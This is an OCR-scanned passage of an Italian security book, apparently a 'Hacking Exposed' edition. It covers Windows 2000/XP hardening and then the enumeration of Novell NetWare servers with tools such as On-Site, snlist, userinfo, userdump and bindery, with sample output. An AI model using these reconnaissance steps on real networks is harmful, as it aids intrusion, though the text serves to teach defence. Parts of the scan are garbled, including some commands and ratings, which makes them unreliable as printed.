Configurazione computer/Impostazioni di Windows/Impostazioni protezione/Crite- 
ri locali/Opzioni di protezione. Qui, infatti, sono visualizzati più di trenta parametri 
diversi che possono essere configurati per migliorare la protezione per qualunque 
oggetto al quale il GPO viene applicato. Tra questi parametri vi sono: Consenti l'ac- 
cesso libero agli utenti anonimi (l'impostazione RestrictAnonymous), Livello di au- 
tenticazione di LanManager e Rinomina account amministratore, tre impostazioni 
importanti che in NT 4 erano accessibili attraverso svariate interfacce. 

Il nodo /mpostazioni protezione è anche quello che permette di impostare Criteri 
account, Criteri controllo, Criteri chiave pubblica e Criteri di protezione IP su com- 
puter locale, consentendo l’impostazione di queste procedure ottimali a livello di si- 
to, dominio o OU. Il compito di gestire la protezione in ambienti che includono un 
grande numero di computer risulta notevolmente ridotto. La Figura 5.11 mostra 
l'oggetto Criterio di dominio predefinito. 


in Criterio gruppo 


x os b ui alia 5 ostazione Gi pro... |__ 


ki (ER) Appica l'unicità della password memaorizzando le ultime 0 password 
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(SÌ Impostazioni protezione 
Eì RI Criteri account JI p gra 
H 3-22 Gi ario passa ord pe U 0 giorni 
È) C@ Criterio di blocco accor | 
E-€8 Criteri locali 
81-02 Criteri controllo 
#)-C1Ò Assegnazione diritti ut 
EC Opzioni di protezione 
® Q Criteri chiave pubblica “ 


MA Carri emrbrigiono enfhi 


Figura 5.11 
Il criterio di dominio predefinito. 


I GPO sembrano essere il metodo migliore per configurare domini Windows 2000 
e versioni successive. Tuttavia potreste accorgervi che a volte i risultati sono inco- 
stanti quando abilitate alcune combinazioni di criteri a livello locale e di dominio; 
inoltre anche il ritardo prima che le impostazioni di Criteri di gruppo diventino ef- 
fettive può essere frustrante. L'utilizzo dello strumento secedit per aggiornare 
immediatamente il criterio è uno dei modi per affrontare il problema di questo ri- 
tardo. Per aggiornare il criterio con secedit, aprite la finestra di dialogo Esegui e 
inserite la stringa seguente: 


secedit /refreshpolicy MACHINE_POLICY 
Per aggiornare i criteri sotto il nodo Assegnazione diritti utente, digitate invece: 


secedit /refreshpolicy USER POLICY 
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IPSec 


In Windows 2000 e versioni successive viene implementato lo standard IP Sec. 
Sebbene sia spesso associato a reti private virtuali e al “tunneling” di traffico di 
dati riservati sulla rete in canali criptati, IPSec, così come viene implementato nel- 
la famiglia NT, consente anche di configurare filtri del traffico di rete basati su 
host. I filtri di IPSec elaborano i pacchetti molto precocemente nello stack della 
rete e rigettano i pacchetti ricevuti su un'interfaccia se non soddisfano i criteri del 
filtro. A differenza dei filtri TCP/IP, i filtri di IPSec possono essere applicati a sin- 
gole interfacce e bloccano correttamente l’ICMP (sebbene non siano sufficiente- 
mente specifici da bloccare singoli sottotipi di ICMP quali echo, echo reply, indi- 
catori data e ora e via dicendo). I filtri di IPSec non richiedono un riavvio del si- 
stema per l’attivazione (sebbene le modifiche apportate ai filtri provochino la di- 
sconnessione di connessioni IPSec esistenti). Essi sono soprattutto una soluzione 
per i soli server, non un firewall personale per le workstation, poiché bloccano il 
lato interno di connessioni legittime dirette all’esterno (a meno che tutte le altre 
porte siano accessibili), così come i filtri TCP/IP. L’ICF (Internet Connessione 
FirewalD è un tool migliore per la protezione delle workstation (ne parleremo tra 
breve in questo paragrafo). 


Anche il RRAS (Routing and Remote Access) implementa filtri simili a quel- 
li di IPSec, che incidono in misura minore sulle prestazioni. 


Potete creare filtri IPSec utilizzando l’applet di Strumenti di amministrazione/Crite- 
ri di protezione locali (secpol.msc). Nella GUI, fate clic con il tasto destro del mou- 
se su Criteri di protezione IP su computer locale situato nel riquadro a sinistra, quin- 
di selezionate Gestisci elenchi filtri IP e operazioni filtro. 

Occorre rilevare che di default i filtri IPSec non bloccano il traffico multicast © 
broadcast, QoS RSVP, IKE (/nternet Key Exchange) porta 500 (UDP), o Kerberos 
porta 88 (TCP/UDP); per maggiori informazioni su questi servizi quando sono cor- 
relati a IPSec in Windows 2000 visitate l’indirizzo http://support.microsoft.com 
/support/kb/articles/0253/1/69.asp. Nel Service Pack 1 è stata inclusa una 
nuova impostazione del Registro che consente di disabilitare le porte Kerberos di- 
sattivando la regola IPSec di esenzione dei driver: 


HKLM\SYSTEM\CurrentControlSet\Services\IPSEC\NoDefaultExempt 
Type: DWORD 


Max: 1 
Min: 
Default: 0 


Solo IKE, Multicast e Broadcast rimangono esenti e non sono influenzati da questa 
impostazione del Registro. Il traffico Kerberos e RSVP non è più esentato di default 
se questo Registro è impostato a 1. 


Ufficialmente, Ipsecpol non è supportato da Microsoft e può produrre risul- 


tati non riproducibili. In Windows .NET Server 2003, il comando netsh im- 
plementa i tool di modifica di IPSec da riga di comando. 
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runas 


I sostenitori di UNIX potrebbero avere l'impressione che si iratti di un piccolo passo 
per il mondo Windows, iuttavia finalmente Windows 2000 propone un comando 
nativo di cambio utente chiamato runas e analogo al comando su di UNIX, 

Una delle regole ormai assodate nel mondo della sicurezza è che la scelta migliore 
possibile è quella di eseguire le operazioni nel contesto dell'account utente che di- 
spone dei privilegi minimi indispensabili, perché programmi trojan eseguibili, mes- 
saggi di posta o siti Web remoti, visitati con un browser, sono tutti in grado di lan- 
ciare comandi con i privilegi dell'utente attualmente connesso e tanto maggiori 
sono questi privilegi, tanto peggiore può essere il danno potenziale. 

Molti di questi attacchi subdoli possono verificarsi durante le attività di tutti i giomi e 
sono pertanto particolarmente rilevanti per coloro che necessitano dei privilegi di Ad- 
minijstrator per svolgere almeno parte del loro lavoro giomaliero (per esempio aggiunta 
di workstation al dominio o gestione degli utenti dell'hardware). La maledizione di 
quelle povere anime che si connettono al loro sistema come Administrator è che non 
hanno mai abbastanza tempo libero per connettersi come utenti normali, come vorreb- 
bero le normali procedure di sicurezza. Questa può essere una cosa particolarmente 
pericolosa nel mondo odiemo, caratterizzato da una sempre maggiore connessione al 
Web della rete aziendale. Se un Administrator si dovesse imbattere in un sito Web con 
problemi o dovesse leggere un messaggio di posta elettronica formattato HTML con in- 
corporato un contenuto attivo (si veda il Capitolo 16), il danno che potrebbe subire sa- 
rebbe di portata ben maggiore rispetto a quanio potrebbe accadere se fosse un normale 
utente sulla propria workstation a commettere lo stesso errore. 

Il comando runas permette a chiunque di connettersi come utente con privilegi li- 
mitati e poi di passare ad Administrator quando l'operazione da compiere lo richie- 
de. Per esempio, supponiamo che Joe sia connesso come utente normale del grup- 
po User al controllore di dominio tramite Terminal Server e che improvvisamente 
abbia la necessità di cambiare una delle password dei membri di Domain Admins 
(magari perché uno di essi ha appena deciso di licenziarsi e se n'è andato sbattendo 
la porta). In qualità di utente normale però non può nemmeno avviare lo strumento 
Utenti e computer dî Aclive Directory, quindi figuriamoci se può cambiare una pass- 
word di un membro di Domain Admins. Ecco allora che a salvare Joe entra in gioco 
runas, che egli utilizza nei modo seguenie. 


1. Fa clic su Start/Esegiti e inserisce la stringa seguente: 


runas /user:imydomain\Administrator "mmc 
s&windir®%\ system32\dsa.msc". 


ID 


. Digita la password di Administrator. 

3. Dopo aver avviato Ulenti e computer di Active Directory (dsa.mmec), può 
modificare la password di Administrator a proprio piacimento in quanto de- 
tiene i privilegi dell'account mydomain/Administrator. 

4, Fatto questo chiude Utenti e computer di Active Directory e torna alla sua 
vita di utente normale. 

Il nostro eroe joe si è appena risparmiato la fatica e il rischio di disconnettersi da 
Terminal Server, riconnettersi come Administrator, disconnettersi di nuovo e, infine, 
rientrare come utente normale. La parola d'ordine è: privilegi minimi ed efficienza 
minima. 
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Se tenete premuto il tasto Maiusc quando fate clic con il tasto destro del 
mouse su un file in una finestra di Esplora risorse di Windows 2000, nel 
menu contestuale apparirà l'opzione Esegui come. 


.NET Framework 


.NET Framework (.NET FX) di Microsoft abbraccia un ambiente per la creazione, 
l'utilizzo e l'esecuzione di Web Services e altre applicazioni. Non confondetevi con 
la generica .NET Initiative di Microsoft, comprendente prodotti quali \NET Server 
2003 e Office.NET (a quanto pare, tutti i nuovi prodotti Microsoft finiscono in 
.NET!). .NET Framework è una parte integrante di tale progetto, ma è una piattafor- 
ma tecnologica distinta all'interno della più generica visione .NET di un personal 
computer come socket di servizi. 

In realtà molti hanno definito .NET Framework come un concorrente in termini di 
funzioni dell'ambiente di programmazione Java di Sun Microsystems e dei servizi 
correlati. Chiaramente si tratta di un cambiamento enorme per Microsoft. Fornisce 
un ambiente di sviluppo ed esecuzione interamente separato e distinto dall’appog- 
gio originale del mondo Windows, l'API Win32 e NT Services. Come la mossa desti- 
nata ad allineare tutti i prodotti con l’allora nascente Internet a metà degli anni No- 
vanta, .NET Framework rappresenta un punto di partenza significativo per Micro- 
soft. Probabilmente diventerà strettamente integrata a tutte le sue tecnologie future. 
La comprensione delle implicazioni di questa nuova direzione è importante per 
chiunque debba garantire la sicurezza delle future tecnologie di Microsoft. 


| Per ulteriori informazioni su .NET Framework, consultate Windows 2000, 
la sicurezza, Apogeo, 2000. 


Internet Connection Firewall 


ICF Unternet Connection FirewalD è probabilmente la funzionalità di sicurezza più 
visibile inclusa in Windows XP. ICF soddisfa l'esigenza di una soluzione completa 
per la sicurezza della rete, facilmente impostabile e configurabile in fase di installa- 
zione del sistema operativo. ICF offre inoltre un filtraggio di pacchetti che consente 
l'utilizzo di una rete di uscita libera con il blocco della connettività non richiesta in 
entrata, rendendo la sicurezza di rete trasparente per gli utenti. 

Gli aspetti principali da rilevare a proposito di ICF sono due: non è attivato di de- 
fault e attualmente non prevede il filtraggio del traffico diretto all’esterno, Inoltre è 
impossibile il filtraggio in base all'indirizzo IP. A parte questi difetti relativamente 
insignificanti (che probabilmente non sarebbero comunque sfruttati da utenti non 
particolarmente evoluti), la funzionalità di filtraggio dei pacchetti da esso fornita è 
solida e facilmente gestibile. La protezione di ICF può anche essere estesa a reti di 
piccole dimensioni tramite ICS Unternet Connection Sharing), che effettua la con- 
versione NAT (Network Address Translation) e il filtraggio di pacchetti su host di ga- 
teway con diverse interfacce di rete. Configurati opportunamente, ICF e ICS rendo- 
no Windows XP praticamente invisibile alla rete e creano una barriera praticamente 
insuperabile per i potenziali intrusi. 
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Crittografia del file system 


Uno degli elementi centrali più importanii in materia di sicurezza di Windows 
2000 è l'EFS (£ncrypting File System), un sistema basato sulla crittografia a 
chiave pubblica per la cifratura trasparente dei dati su disco in tempo reale, in 
modo che gli hacker non possano accedervì senza la chiave appropriata. 
Microsoft ha pubblicato un documento che analizza il funzionamento di EFS, 
disponibile all'indirizzo http://www.microsoft.com/windows2000/techinfo/ 
howitworks/security/encrypt.asp). In breve potremmo dire che EFS può 
crittografare un file o una cartella con un algoritmo di cifratura rapido e simme- 
trico, utilizzando una chiave crittografica FEK (File Encryption Key) generata in 
modo casuale e specifica per il file o la cartella. La release iniziale di EFS utiliz- 
za il DESX (Extended Data Encryption Standard) come algoritmo di cifratura: la 
chiave di cifratura generata casualmente viene quindi essa stessa criptata con 
una o più chiavi pubbliche, compresa quella dell’utente (ogni utente in Win- 
dows 2000 riceve una coppia di chiavi pubblica/privata) e un agente di recupe- 
ro chiavi RA (Recovery Agent). Questi valori cifrati vengono memorizzati come 
attributi del file. 

Il recupero della chiave viene implementato nel caso in cui, per esempio, alcuni di- 
pendenti, che hanno cifrato dati importanti, lascino un'organizzazione oppure per- 
dano la loro chiave di cifratura. Per impedire la perdita irreparabile di dati cifrati, 
Windows 2000 impone l'esistenza di un agente di recupero dei dati per EFS e, infat- 
ti, senza di esso la cifratura non funzionerà. Dato che il FEK è completamente indi- 
pendente dalla coppia di chiavi pubblica/privata di un utente, un agente di recupe- 
ro può decifrare ii contenuto di un file senza compromettere la chiave privata 
dell'utente. L'agente di recupero predefinito per un sistema è l'account dell'ammini- 
stratore locale. 

Sebbene EFS possa essere utile in molte sinuazioni, probabilmente non è adatto nel 
caso in cui vi siano più utenti cli una stessa workstation che desiderano proteggere i 
propri file dagli alrri: per questo, infatti, esistono le liste di controllo degli accessi 
(ACL) del file sysiem NTFS. Microsoft suggerisce di utilizzare EFS come livello di 
protezione contro gli attacchi in cui le protezioni di NTFS vengono aggirate, come 
l'avvio con un sistema operativo alternativo e l'utilizzo di strumenti di terze pani per 
accedere a un disco fisso, oppure per i file memorizzati su server remoti. Il docu- 
mento che Microsofr dedica a EFS sostiene in modo specifico che “EPS si rivolge in 
modo particolare alle preoccupazioni relative alla sicurezza, generate da strumenti 
disponibili su altri sistemi operativi i quali permettono agli utenti di accedere ai file 
di un volume NTFS senza una verifica degli accessi”. A meno che non sia imple- 
mentato nel contesto di un dominio Windows, questa affermazione è difficile da so- 
stenere. 


Raw Sockets e altre critiche non comprovate 


Finora sono state avanzate molte critiche sulla sicurezza di Windows XP e .NET Ser- 
ver e sicuramente altre seguiranno dopo la distribuzione. Sia che siano state avanza- 
ti da Microsoft, dai suoi sostenitori o dai suoì molti critici, questi dubbi verranno dis- 
sipati solo dal tempo e dai test in scenari reali. Poco prima del lancio di Windows 
XP, un esperto di sicurezza, Steve Gibson, ha causato molta sensazione asserendo 
che il supporto di Windows XP per un'interfaccia di programmazione chiamara Raw 
Sockets porterà a diffusi attacchi di rilevamento dell'indirizzo di rete e Denial of Ser- 
vice basati su rali recniche. Ovviamente questa apocalisse non si verificherà mai. 
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Meditate su questa affermazione, che riassume piuttosto bene la nostra posizione 
sulla sicurezza di Windows. 

La maggior parte della tanto propagandata “insicurezza” di Windows è provocata da 
errori comuni esistenti da molto tempo in molte altre tecnologie. Sembra che sia 
peggiorata solo per via del diffuso utilizzo di Windows. Se scegliete di adottare la 
piattaforma Windows per gli stessi motivi che l'hanno resa così famosa (facilità 
d'utilizzo, compatibilità e così via), dovrete affrontare il problema di come renderla 
sicura e mantenerla tale. Si spera che la conoscenza acquisita con questo libro vi 
renda più sicuri. 
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Hacking di Novell NetWare 


Uno dei più comuni fraintendimenti relativi a Novell è che i prodotti di 
quest'azienda sarebbero superati e attualmente inutilizzabili (almeno questo è 
quanto Microsoft e i produttori di sistemi UNIX vogliono farvi credere). Anche 
se la quota di mercato nelle vendite di server Novell non è certo in crescita, 
NetWare è ben lontano dall'essere morto e sepolto. Con la cifra impressionante 
di 81 milioni di utenti NetWare nel mondo e una stima di 4,5 milioni di server 
(Novell Partner Sales ‘Training, per informazioni consultate la pagina Web 
www.novell.com/partners/quicktrain/pdf/nw6.pdf), il rischio di esposizio- 
ne dei dati delle aziende è elevato come non mai. Con la recente acquisizione 
dell'azienda produttrice di software SilverStream, nel luglio 2002, Novell si sta 
trasformando da semplice provider di un sistema operativo di rete in una piatta- 
forma completa di servizi Web: questo significa che gli amministratori NetWare 
non dovranno guardarsi solo dagli attacchi di tipo NCP ed NDS, ma dovranno 
confrontarsi con le stesse difficoltà degli amministratori NT e UNIX, continua- 
mente bersaglio di attacchi provenienti dal Web. 

Per molti anni i server Novell hanno conservato le più importanti informazioni 
delle aziende e tutti i dati di maggior valore: contabili, relativi alle buste paga 
dei dipendenti, ai consuntivi e ai budget aziendali, alle risorse umane e ai movi- 
menti finanziari (per nominare alcune categorie). Probabilmente sarete sorpresi 
nello scoprire quante siano le aziende che non possono o non desiderano ab- 
bandonare la piattaforma Novell, assumendosi gli oneri di rischiosi trasferimenti 
dei dati. Fino a ora, le cose sono andate bene per gli amministratori NetWare: 
molti degli attacchi lanciati fino a oggi contro i sistemi NT hanno sfruttato le im- 
perfezioni del protocollo TCP/IP, quindi gli utilizzatori di NetWare hanno sem- 
pre riso sotto i baffi considerando sicuro il protocollo proprietario IPX/SPX. Non 
appena installeranno NetWare 5, che è dotato del supporto IP nativo, anche 
questi amministratori saranno proiettati nell'universo delle problematiche della 
sicurezza di rete. 

Ma i sistemi Novell NetWare sono sicuri? Novell ha lavorato per molti anni sulla 
sicurezza dei suoi prodotti, perché allora dobbiamo preoccuparci della sicurez- 
za di quello che dovrebbe essere il Fort Knox dei sistemi informativi? Questo è il 
genere di risposte che potreste ottenere direttamente da Novell, ma non da 
esperti di sicurezza dei sistemi informatici. È vero che NetWare può essere un 
sistema decisamente sicuro ma, a essere sinceri, sotto molti punti di vista c’è an- 
cora tanto lavoro da fare. Le impostazioni predefinite di NetWare 4.x non preve- 
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dono praticamente alcun livello di sicurezza abilitato. Per esempio, nella versio- 
ne predefinita di NetWare qualunque utente è in grado di consultare l'albero 
delle risorse NDS (Novel! Directory Services) senza la necessità di autenticarsi. 
Inoltre, cosa ancora più grave, gli utenti di Novell non devono avere obbligato- 
riamente una password e durante la creazione degli account gli amministratori 
non sono costretti a specificare alcuna password. 

Se pensate che questo tipo di attacco a NetWare è stato descritto in termini trop- 
po semplicistici, provate a fare voi stessi un tentativo. Molti amministratori di si- 
stemi NetWare non comprendono a fondo le implicazioni delle impostazioni 
predefinite di un server e non si sono mai occupati di problemi di sicurezza, fa- 
cendo affidamento sulla cosiddetta “sicurezza fornita dall’oscurità”; di conse- 
guenza non tentano di rendere più restrittive le norme relative alla salvaguardia 
dei sistemi. 

Nel momento in cui cercherete di simulare l'attacco di un hacker per verificare la si- 
curezza del sistema tentando di introdurvi come farebbe lui, attraverso i buchi la- 
sciati aperti dalle impostazioni predefinite di NetWare, vi assicuriamo che rimarrete 
a bocca aperta. 

Nel Capitolo 3 abbiamo analizzato il modo in cui gli hacker possono introdursi 
di nascosto e circolare liberamente nelle vostre reti per raccogliere informazioni 
utili a connettersi al vostro server Novell. In questo capitolo cercheremo di com- 
pletare il discorso, analizzando i passi successivi necessari per completare un at- 
tacco: lo scopo principale di questa invasione consiste nell’ottenere le creden- 
ziali di amministratore di sistema Novell ed, eventualmente, di appropriarsi allo 
stesso modo delle risorse dell’albero NDS. Purtroppo, questo genere di attacco è 
stato riscontrato molto spesso ed è abbastanza comune. La maggior parte degli 
attacchi descritti in questo capitolo dipende da un'impostazione predefinita su 
tutti i server NetWare 4, 5 e 6, ma che potrebbe non essere presente sui vostri: il 
contesto bindery. Si tratta di una caratteristica derivata da NetWare 3 che per- 
mette la comunicazione con reti basate su Windows 2000 mediante il supporto 
al vecchio formato della password del gestore della LAN: perfetta per garantire 
la compatibilità, ma disastrosa per la sicurezza. 


Collegarsi senza connettersi 


Diffusione: 10 
Semplicità: 9 
Impatto: 1 
Fattore di rischio: 7 


Il primo passaggio che un hacker deve compiere per invadere un sistema consi- 
ste nel creare un attachment (collegamento) anonimo a un server Novell. Per 
capire che cosa sia un attachment, dobbiamo innanzitutto comprendere il mec- 
canismo di autenticazione (login) di NetWare. Novell ha progettato il sistema 
NetWare in modo che per autenticarsi a un server è necessario creare un attach- 
ment al sistema. I processi di questo tipo sono collegati tra loro, ma non sono 
interdipendenti. In altre parole, quando l’autenticazione fallisce, l’attachment al 
sistema viene conservato. Per questo motivo non è necessario avere a disposi- 
zione un nome utente e una password validi per poter ottenere il collegamento 
richiesto. Come abbiamo già visto, dopo aver creato l’attachment, un hacker ha 
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a disposizione tutti gli elementi necessari per poter tentare la scalata al sistema 
NetWare che trova disponibile. 

Nel Capitolo 3 abbiamo mostrato come sia possibile elencare le risorse della rete, 
alla ricerca di tutti i server NetWare presenti e dell’albero delle risorse. A questo 
punto non vi resta che eseguire l’attachment a un server; purtroppo, esiste un gran 
numero di modi per realizzare questa operazione. Verranno discussi gli strumenti 
principali che sono necessari per eseguire l’attachment a un server NetWare: On- 
Site Admin di Novell, snlist e nslist. 

Potete anche tentare di eseguire l'attachment utilizzando i tradizionali programmi 
client per DOS (login) e per Windows (Client32 Login); ma in questo caso avrete la 
necessità di eseguire la procedura di autenticazione (questo non dovrebbe essere 
possibile, dal momento che non conoscete un nome utente valido e la password 
corretta che gli viene associata). L'utilizzo di un client per eseguire l’attachment non 
è considerato una tecnica percorribile da un hacker, visto che i tentativi di autenti- 
cazione errati sono registrati dal sistema. Nessun hacker che sia degno di questo 
nome utilizzerà un metodo di questo tipo per ottenere l’attachment. 


O On-Site Admin 


Se siete un amministratore di sistema, On-Site è uno strumento molto utile, che do- 
vreste tenere sempre a portata di mano (ftp://ftp.cdrom.com/.1/novell/onsite 
.zip). On-Site è un prodotto distribuito da Novell stesso, in grado di visualizzare in- 
formazioni relative a un sistema NetWare attraverso un’interfaccia grafica. Esso for- 
nisce utili indicazioni sui server e sugli alberi delle risorse, consentendo di avere 
uno strumento di valutazione delle impostazioni di sicurezza della vostra rete. Gli 
sviluppatori di Novell sono stati molto bravi nel rendere disponibile uno strumento 
del genere, che, tuttavia, può essere anche utilizzato contro di voi. Per ironia della 
sorte, questo è diventato uno degli strumenti principali per poter tentare un attacco 
a un sistema Novell. 

Quando il programma viene avviato, la sua interfaccia grafica mostra tutti i server 
NetWare che sono stati rilevati dalla scansione Network Neighborhood, che avete 
studiato nel Capitolo 3. A questo punto dovete semplicemente fare clic su uno dei 
server mostrati da On-Site. Questa operazione creerà automaticamente un attach- 
ment al server. Potete verificarne l'attivazione utilizzando NetWare Connections di 
Client32. In questo modo sarete in grado di creare, uno dopo l’altro, gli attachment 
a tutti i server che desiderate analizzare. 


de 


® snlist e nslist 


I programmi snlist e nslist sono entrambi in grado di eseguire attachment al ser- 
ver, allo stesso modo di On-Site. L'unica differenza consiste nel fatto che funziona- 
no solamente attraverso la linea di comando. snlist tende a essere molto più rapi- 
do e viene considerato, quindi, lo strumento giusto per eseguire questa operazione; 
nslist, tuttavia, è in grado di visualizzare l'indirizzo completo del server, che, in 
seguito, potrà essere utile. Entrambi questi programmi possono essere utilizzati sen- 
za dover specificare parametri per eseguire attachment a tutti i server presenti sulla 
rete: in alternativa potete specificare il nome del server come parametro, per ese- 
guire l’attachment a un sistema specifico. La tecnica di attachment è il fondamento 
per l'esecuzione di intrusioni che vedremo in seguito. 
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Se avete problemi nell'esecuzione di un attachment a un server Novell, veri- 
ficate il vostro server Set Primary. Potete effettuare questa operazione apren- 
do la finestra di dialogo Network Connections e controllando se esiste un 
server segnalato con un asterisco prima del nome. Prima di utilizzare que- 
sti strumenti dovete avere almeno un attachment attivo per un server esi- 
stente. Se tutto vi sembra corretto, ma continuate ad avere problemi, sele- 
zionate un altro server e fate clic sul pulsante Set Primary. 


Quando impiegate strumenti a riga di comando, molto probabilmente 
avrete la necessità di avviare un nuovo prompt dei comandi (cmd.exe 
per NT oppure command. com per Win9x), ogni volta che desiderate effettuare 
una nuova connessione. Se non eseguite questa operazione, potreste incon- 
trare una grande quantità di errori imprevisti e perdere molto tempo. 


© Contromisure per l’attachment 


Per ora non sembrano esistere contromisure possibili per poter disabilitare il mec- 
canismo di attachment automatico a un server NetWare. Questa funzionalità, inol- 
tre, pare sia altresì presente in NetWare 5. 


Scansione dei bindery 
e degli alberi delle risorse 


Diffusione: 9 
Semplicità: 16 
Impatto: 3 
Fattore di rischio: # 


Una volta ottenuto lo stato di attachment senza autenticazione, è possibile recupe- 
rare dal sistema molte informazioni, molte più di quante se ne potrebbero ottenere 
normalmente. Programmi come userinfo, userdump, finger, bindery, bindin, 
nlist e cx consentono di ottenere informazioni sui bindery (i collegamenti di 
NetWare). I programmi di utilità come On-Site e NDS permettono invece di effettua- 
re la scansione dell’albero delle risorse. Il loro utilizzo combinato consente di otte- 
nere dal sistema la maggior parte delle informazioni necessarie per un attacco intru- 
sivo. Ricordatevi che tutte queste informazioni sono disponibili semplicemente ef- 
fettuando un attachment a un server Novell. 


® userinfo 


Possiamo utilizzare la versione 1.04 di userinfo, chiamata ufficialmente NetWare 
User Information Listing (applicazione di scansione delle informazioni utente di 
NetWare) anche se la versione 2.1 dispone di alcune funzionalità notevoli. Il pro- 
gramma è stato scritto da Tim Schwab (http://userinfo.swrus.com) ed è in gra- 
do di fornire un rapido elenco di tutti gli utenti presenti nel bindery di un server. 
userinfo consente anche di ricercare un nome utente specifico: è sufficiente spac- 
ciare il nome utente come parametro del programma. Come potete vedere nella fi- 
gura a pagina seguente, è possibile ottenere tutti i nomi utente definiti nel sistema, 
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compreso l'ID oggetto di ciascun utente. Per ottenere questo risultato, è necessario 
eseguire l’attachment al server SECRET e avviare il programma di utilità userinfo. 


Ma C:VWINNT\System32\cmd.exe 
SECRET / Sunday, April 4, 1999 / 11:13 am 
User ID Name Disabled Locked Password Last Login Address 


Prpggoni admin insufficient rights 
S SSCABRray insufficient rights 
smneclure insufficient rights 
dA jsymoens insufficient rights 


gkurtz insufficient rights 
di ndolphin insufficient rights 
deoane insufficient rights 
jsmith insufficient rights 
poni insufficient rights 
jhanley insufficient rights 


130190601 mmeadows insufficient rights 
‘4919061 abirchard insufficient rights 
15019901 ehammond insufficient rights 
‘(6919901 jbenson insufficient rights 
‘79019961 eculp insufficient rights 
18019981 jhomey insufficient rights 
19010001 pit insufficient rights 
‘A010081 jgoldberg insufficient rights 
'B019981 estein insufficient rights 


found 


® userdump 


La versione 1.4 di userdump, scritta da Roy Coates (http://www.roy.spang. 
org/freeware/userdump.html), svolge all'incirca le stesse funzioni di userinfo, 
visualizzando l'elenco degli utenti definiti nel sistema. Oltre a questo, userdump 
è in grado di visualizzare anche il nome completo assegnato all'utente, come 
mostrato nella figura che segue. Un hacker potrebbe utilizzare il vero nome 
dell'utente per tentare di effettuare qualche tipo di attacco non tecnico, come 
per esempio telefonare al centro di assistenza dell'azienda e richiedere la modi- 
fica della password. 


5 C:NWINNT\System32 2\emd exe 


1 ABIRCHARD 65-???-77 68:79 N/A 
2 ADMIN 65-272-22 68:79 N/A 
3 DEOANE Dan Seoane 65-???-727 68:79 N/A 
4 ECULP 65-???-22 68:79 N/A 
5 EHAMMOND 65-27?-72 68:79 N/A 
6 ESTEIN 65-???-927 68:79 N/A 
7 GKURTZ George Kurtz 65-???-27 68:79 N/A 
8 JBENSON 65-?7?-77 68:79 N/A 
9 JGOLDBERG 65-?7?-27 68:79 N/A 
10 JHANLEY 65-?7?-27 68:79 N/A 
11 JHOMEY 65-?7?-?272 68:79 N/A 
12 JSCAMBRAY Joel Scambray 65-???-77 68:79 N/A 
\ 13 JSMITH 65-?7?2-27 68:79 N/A 
| 14 JSYMOENS Jeff Symoens 65-???-27 68:79 N/A 
15 MDOLPHIN Martin Dolphin 65-???-77 68:79 N/A 
16 MMEADOWS 65-?7?-27 68:79 N/A 
17 RPAUL 65-?77-27 68:79 NZA 
18 SMCCLURE Stuart McClure 65-?7?-27 68:79 N/A 
19 TGOODY 65-??7-27 68:79 N/A 


C:i\novell>, 
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CD) finger 


finger non è uno strumento necessario per ottenere l'elenco di utenti di un siste- 
ma, ma viene preso in considerazione perché è di grande aiuto nella ricerca di un 
particolare utente del sistema, 

Per esempio, un hacker potrebbe aver concluso un’intrusione all’interno dei vostri 
sistemi Windows NT o UNIX e aver ottenuto un certo numero di nomi utente e 
password. 

Il nostro hacker è a conoscenza del fatto che gli utenti molto spesso sono anche 
definiti con le stesse credenziali su altri sistemi e che molto spesso per semplicità 
utilizzano la stessa password. 

Di conseguenza un pirata tenterà frequentemente di utilizzare i nomi utente e le 
password scoperti per cercare di effettuare un’intrusione in altri sistemi, per esem- 
pio all’interno di server Novell. 

Per ricercare l’esistenza di utenti all’interno di un sistema, digitate semplicemen- 
te finger <nomeutente>. 

Dovete comunque essere cauti nell’utilizzo di finger, in quanto questo pro- 
gramma potrebbe essere molto “rumoroso”. 

Non siamo riusciti a capire bene perché, ma quando ricercate con quest'ultimo 
un utente che è correntemente connesso al sistema, in alcuni casi sulla postazio- 
ne dell'utente appare un messaggio di popup di NetWare (una semplice finestra 
di dialogo) priva di testo. 


CD) bindery 


Conoscere i nomi degli utenti definiti in un server è sicuramente di grande aiuto, ma 
un ipotetico hacker dovrà avere a disposizione maggiori informazioni prima di sot- 
toporre ciascuno di essi a un attacco, 

Per esempio, potrebbe essere interessante sapere quali utenti appartengono al 
gruppo Admins (che supponiamo sia il gruppo degli amministratori di sistema). 

Il programma NetWare Bindery Listing Tool, versione 1.16, distribuito da Manth- 
Brownell, è in grado di mostrare praticamente qualunque oggetto presente nel bin- 
dery (Figura 6.1). 

bindery consente anche di interrogare il server per ottenere informazioni relative a 
un singolo utente o gruppo. 

Per esempio potete lanciare il comando bindery admins per scoprire quali utenti 
sono stati assegnati al gruppo Admins. 

Inoltre il parametro /B può essere molto utile quando desiderate visualizzare una 
singola riga per ciascun oggetto. 

Questo vi potrebbe servire nel momento in cui cercate di visualizzare contempora- 
neamente un grande numero di oggetti. 


C) bindin 


Come bindery, anche il programma bindin consente di visualizzare oggetti come 
file server, utenti e gruppi; bindin, però, è fornito di un’interfaccia più organizzata. 
Anche bindin consente di visualizzare i membri dei vari gruppi, in modo da poter 
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= C-VWINNTXSystem32\cmd. exe 


B010001 ESTEIN 
HOME_DI RECTORY 
GROUPS_I'M_IN ‘ 

HUMAN_RESOURCES 
RELA N_INFO 


CN 

| OBJECT_CLASS 
PUBLI C_KEY 
SURNAME 
LANGUAGE 
TRUSTEE ASSIGNMENTS 

CINSUFFICIENT RIGHTS> 
LOGIN SCRIPT 

OPEN ERROR: NO SUCH FILE OR DIRECTORY 


DB10063 ADMINS 2 GROUP 
GROUP_MEMBERS 
JSYMOENS 
ACL 
CN 
OBJECT_CLASS 


REVISION 
EQUAL_TO_ME 
JSYMOENS 


DEOANE 
TRUSTEE ASSIGNMENTS 
CINSUFFICIENT RIGHTS) 


| E01900D Mussa ________ ‘SS eoeeenaI 278 UNKNOWN 


36FCC6 
TRUSTEE ASSI 8 

CINSUFFICIENT RIGHTS) 
133 objects found 


|G:\nove11> 


Figura 6.1 


bindery fornisce un'enorme quantità di informazioni, inclusi gli appartenenti ai singoli gruppi, 
come per esempio il gruppo Admins. 


attaccare con più facilità i nomi utente presenti nei gruppi MIS, IT, ADMIN, GENE- 
RALADMIN, LOCALADMIN ecc. 
e bindin u visualizza tutti gli utenti presenti in un server. 


e bindin g visualizza tutti i gruppi e la loro composizione. 


O) nlist 


nlist ha preso il posto del programma di utilità già presente in NetWare 3.x, chia- 

mato slist, che è in grado di visualizzare tutti i server NetWare presenti sulla rete; 

